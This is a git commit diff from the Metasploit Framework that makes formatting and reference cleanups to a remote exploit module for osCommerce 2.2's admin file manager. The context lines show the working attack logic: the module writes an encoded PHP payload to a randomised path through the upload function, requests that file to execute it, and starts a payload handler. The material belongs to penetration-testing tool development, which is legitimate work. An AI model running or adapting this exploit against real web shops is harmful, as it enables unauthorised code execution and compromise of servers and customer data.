Cosmetic/reference cleanups.

git-svn-id: file:///home/svn/framework3/trunk@7506 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-14 04:31:00 +00:00 · 2009-11-14 04:31:00 +00:00 · 8b9238e33b
parent cc41639170
commit 8b9238e33b
1 changed files with 12 additions and 14 deletions
--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'osCommerce 2.2 arbitrary file upload',
-			'Description'    => %q{ 
+		super(update_info(info,
+			'Name'           => 'osCommerce 2.2 Arbitrary PHP Code Execution',
+			'Description'    => %q{
 					osCommerce is a popular open source E-Commerce application.
 					The admin console contains a file management utility that
 					allows administrators to upload, download, and edit files.
@ -32,19 +32,19 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => BSD_LICENSE,
 			'Version'        => '$Revision: 7025 $',
 			'References'     => [
-					[ 'MIL', '9556' ]
+					[ 'URL', 'http://www.milw0rm.com/exploits/9556' ]
 				 ],
 			'Privileged'     => false,
 			'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
-			'Payload'        => 
+			'Payload'        =>
 				{
 					'Space'       => 4000,  # max url length for some old
 											# versions of apache according to
 											# http://www.boutell.com/newfaq/misc/urllength.html
 					'DisableNops' => true,
 					#'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
-					'Compat'      => 
+					'Compat'      =>
 						{
 							'ConnectionType' => 'find',
 						},
@ -61,10 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				OptString.new('URI',   [ true,  "Base osCommerce directory path", '/catalog/']),
 			], self.class)
-	
-	end

-	def check
 	end

 	def exploit
@ -72,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		# junk in front of slashes and it will get stripped out. The unlink in
 		# Payload => Prepend above ensures that the file is deleted.
 		filename  = rand_text_alphanumeric(rand(5)+5) + "/"
-		(rand(5)+5).times do 
+		(rand(5)+5).times do
 			filename << rand_text_alphanumeric(rand(5)+5) + "/"
 		end
 		filename << rand_text_alphanumeric(rand(5)+5) + ".php"

-		
+
 		p = rand_text_english(rand(100)+100) + "<?php " + payload.encoded + " ?>" + rand_text_english(rand(100)+100)
 		p = Rex::Text.uri_encode(p)
 		data = "filename=#{filename}&file_contents=#{p}"
@ -106,10 +103,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		timeout = 0.1
 		response = send_request_raw({
 			# Allow findsock payloads to work
-			'global' => true, 
-			'uri' => datastore['URI'] + File.basename(filename) 
+			'global' => true,
+			'uri' => datastore['URI'] + File.basename(filename)
 		}, timeout)

 		handler
 	end
 end
+